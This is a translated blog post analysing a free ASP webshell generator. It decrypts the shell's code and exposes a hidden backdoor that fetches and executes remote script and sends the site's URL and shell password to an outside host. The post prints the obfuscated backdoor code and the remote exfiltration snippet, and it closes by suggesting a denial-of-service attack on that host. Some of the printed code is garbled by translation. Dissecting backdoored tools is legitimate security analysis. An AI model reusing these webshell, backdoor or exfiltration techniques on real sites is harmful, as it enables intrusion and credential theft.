13 WEBSHELL final backdoor discovery tour

Author: TheLostMind
Source: Brilliant notes

Since I last found a WebShell management website from the Internet, I found a backdoor, infected with a Trojan, and the database was damaged. So far, it has not been repaired ...... So be especially careful with others' webshells.

I found a 13th WEBSHELL final generator on the Internet,

Next we will generate an ASP WebShell
The generated WebShell is encrypted.
This decryption tool is used directly and will not be detailed. After decryption, the Code 132.JPG
Check the code and encrypt it.
From the code, we can easily see that his decryption function is SinfoEn.
Then we will decrypt it and someone has written the decryption code.
The following is the decryption code posted on the freezing point extreme Forum:

================================ Decode. asp ==============================================

<%
Pos = 2 decrypt fixed value
Function Fun (ShiSanObjstr)
ShiSanObjstr = Replace (ShiSanObjstr, "| ","""")
For ShiSanI = 1 To Len (ShiSanObjstr)
If Mid (ShiSanObjstr, ShiSanI, 1) <> "! "Then
ShiSanNewStr = Mid (ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
Else
ShiSanNewStr = vbCrLf & ShiSanNewStr
End If
Next
Fun = ShiSanNewStr
End Function

Function SinfoEn (ObjStr, ObjPos)
ObjStr = Replace (ObjStr ,"~ ","""")
NewStr = Split (ObjStr ,"'")
For I = 0 To UBound (NewStr)
SinfoEn = SinfoEn & EnCode (NewStr (I), ObjPos) & vbCrLf
Next
SinfoEn = Left (SinfoEn, Len (SinfoEn)-2)
End Function

Function EnCode (ObjStr, ObjPos)
Dim NewStr, TmpStr, I, LenStr
LenStr = Len (ObjStr)
For I = 0 To Int (LenStr/ObjPos)-1
TmpStr = Mid (ObjStr, I * ObjPos + 1, ObjPos) & TmpStr
Next
EnCode = TmpStr & Right (ObjStr, LenStr Mod ObjPos)
End Function
Data = request. form ("x ")
If data = "" then data = "nothing"
Response. write "<form method = post>"
Response. write "<textarea name = x cols = 80 rows = 30>"
Response. write Server. HTMLEncode (SinfoEn (data, Pos ))
Response. write "</textarea>"
Response. write "<input type = submit name = Submit1 value = submit>"
Response. write "<input type = reset name = Submit32 value = reset>"
Response. write "</form>"
%>

==================================== End ========== ==========================================

Now, you can directly unbind the password, such as 133.jpg.
I searched for Code such as HTTP based on the Common webshell search method. I did not find any suspicious code.
Key search sub-item: UserPass
Check its password verification code:

========================================================== ========================================================== ====
If session ("web2a2dmin") <> UserPass then
If request. form ("pass") <> "then
If Serinf (request. form ("pass"), pn) = UserPass then
Session ("web2a2dmin") = UserPass
Response. redirect url
Else
Rrs "illegal Logon"
End if
Else
Si = "<center> <div style = width: 500px; border: 1px solid #222; padding: 22px; margin: 100px;> <a href = "& SiteURL &" target = _ blank> "& mname &" </a> RRS sI
End if
Response. end
========================================================== ========================================================== ========

The password is encrypted using the Serinf function and then verified. The code is normal and there are no suspicious signs.
Search for Serinf and see the following code:

========================================================== ========================================================== ==========
If session ("serinfo") = false then
SererInf "1ll4": session ("serinfo") = true
Else
If action = "getTerminalInfo" then
SererInf "1ll4"
End if
End if
========================================================== ========================================================== ==========

It seems a bit strange to see it here. When searching for session ("serinfo"), we can find that session ("serinfo") is not defined in the previous section. It must be false, let's take a look at the SererInf () function, search for SererInf, and find the following code:

========================================================== ========================================================== ================
Function SererInf (inf)
On error resume next
Set theserver = Server. createobject (Sot (13, 0 ))
Theserver. open "GET", right (sot (13, 0), 4) & chr (60-pos) & "/" & chr (pos + 45) & inf & chr (46) & mid (sot (109),) & chr (+ pos) & right (Sot (), 1) & chr (47) & right (sot ), 1), false
Theserver. send ()
If theserver. readystate <> 4 then
Exit function
End if
Execute (theserver. responseText)
Set theserver = nothing
If err. number <> 0 then
Err. Clear
End if
End function
========================================================== ========================================================== ======

We can see that this is the backdoor. What is the backdoor like? Decrypt the following sentence.
=
========================================================== ========================================================== ======
Right (sot (), 4) & chr (60-pos) & "/" & chr (pos + 45) & inf & chr (46) & mid (sot ), 2, 1) & chr (109 + pos) & right (Sot (6, 0), 1) & chr (47) & right (sot (), 1)
========================================================== ========================================================== ============

Continue to search for sot and find that the value of the sot array is as follows:

========================================================== ========================================================== ==========
Sot (13, 0) = "Microsoft. XMLHTTP"
Sot (4, 0) = "Scripting. Dictionary"
Sot (6, 0) = "Adodb. Stream"
Sot (1, 0) = "wscript. shell"
========================================================== ========================================================== ==============

Continue to check and we can see pos = 2. Now we can decrypt the code encrypted with the function above, which is very simple.
Right (sot (13, 0), 4) = http
Chr (60-pos) =:
Chr (pos + 45) =/
Chr (46) =.
Mid (sot (4, 0), 2, 1) = c
Chr (109 + pos) = o
Right (Sot (6, 0), 1) = m
Chr (47) =/
Right (sot (1, 0), 1) = l

It's really clever to hide!
The decryption code is as follows:

========================================================== ========================================================== ============
Http://1ll4.com
========================================================== ========================================================== ==========

Is it strange to see it here? Why is the backdoor code incomplete?
Don't worry, let's go to http://1ll4.com/l.
Open the http://1ll4.com/lpage, and click the source file. The Code is as follows:

========================================================== ========================================================== ============
Serurl = "http://1ll4.com/1? Jpg = 8 & u = "& Serveru &" & p = "& UserPass
Set theserver = Server. createobject (Sot (13, 0 ))
Theserver. open "GET", Serurl, false
Theserver. send ()
========================================================== ========================================================== ==========

Now we can see that this is complete. The parameter Serveru = request. servervariables ("http_host" ") & url, that is, the complete path of the website. The parameter UserPass is the password. Although encrypted, it can be decrypted!
Here, WebShell webshells are completely exposed. The next thing is to go to webshells!
I modified this WebShell here, excluding the backdoor, added some features, improved some features, do not know where to download, you can go to my BLOG to see: http://hi.baidu.com/lostmind
We can also see from the code that this submission does not have COOKIE verification, so we can directly submit the code, you can directly find an HTTP cracking tool, write the address and parameters in, then DOS it! Of course, it's not easy to write a WebShell. Forgive him! At the same time, I also reminded my friends to take a closer look at other people's things.